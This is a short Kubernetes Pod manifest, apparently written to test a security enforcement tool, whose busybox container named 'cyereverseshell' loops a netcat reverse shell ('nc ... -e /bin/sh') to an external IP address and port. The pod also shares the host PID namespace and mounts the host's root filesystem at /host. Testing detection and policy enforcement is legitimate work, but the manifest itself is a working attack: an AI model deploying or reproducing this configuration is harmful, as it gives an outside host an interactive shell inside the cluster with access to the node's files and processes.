apiVersion: v1
kind: Pod
metadata:
  name: testpod-enforcement  # New name for testing
  namespace: test  # Changed namespace to 'test'
  labels:
    app: nc
spec:
  hostPID: true  # Allow sharing of the host's PID namespace
  containers:
  - name: cyereverseshell
    image: busybox
    args: ["sh", "-c", "while true; do nc 68.183.22.232 4641 -e /bin/sh; sleep 10; done"]
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
    volumeMounts:
    - name: hostvolume
      mountPath: /host
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory
